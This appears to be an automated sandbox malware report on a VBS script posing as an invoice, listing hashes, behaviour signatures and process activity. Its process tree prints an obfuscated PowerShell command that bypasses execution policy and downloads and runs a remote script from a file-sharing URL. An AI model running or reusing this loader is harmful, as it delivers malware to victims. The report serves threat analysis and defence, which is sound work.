Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 22:31
Static task
static1
Behavioral task
behavioral1
Sample
976e459097d02ba60e08c872cd4e997b8ffde163a3bd7bb4abef17d455b62ed8.iso
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
976e459097d02ba60e08c872cd4e997b8ffde163a3bd7bb4abef17d455b62ed8.iso
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Revised Invoice #03252022.vbs
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Revised Invoice #03252022.vbs
Resource
win10v2004-20241007-en
General
-
Target
Revised Invoice #03252022.vbs
-
Size
636B
-
MD5
e0e7f44f32d0b3dabb08bd61a3b81f6a
-
SHA1
3b5d3334936280cee7be949a7712669300502377
-
SHA256
db00c50095732ed84821f321b813546431f298525fea8dbd1a4545c3abfa1fe1
-
SHA512
78baf7107944bc1cc371f058f73a2ecd1f601b3401d10774440cfcbcc767549bb43143c261422e7bd2e3f345a5ebb99acda70ca1a2033ccbcd08ef86edff8bf1
Malware Config
Extracted
https://transfer.sh/get/9GqmOG/jramooooss.ps1
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2140 powershell.exe -
pid Process 2140 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2140 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2140 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2980 wrote to memory of 2140 2980 WScript.exe 30 PID 2980 wrote to memory of 2140 2980 WScript.exe 30 PID 2980 wrote to memory of 2140 2980 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Revised Invoice #03252022.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exeCutiO BYpASS -C I`eX(n`EW-Ob`J`EcT nET`.weBCLi`ENt).DoWnloAdStRiNG('https://transfer.sh/get/9GqmOG/jramooooss.ps1')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-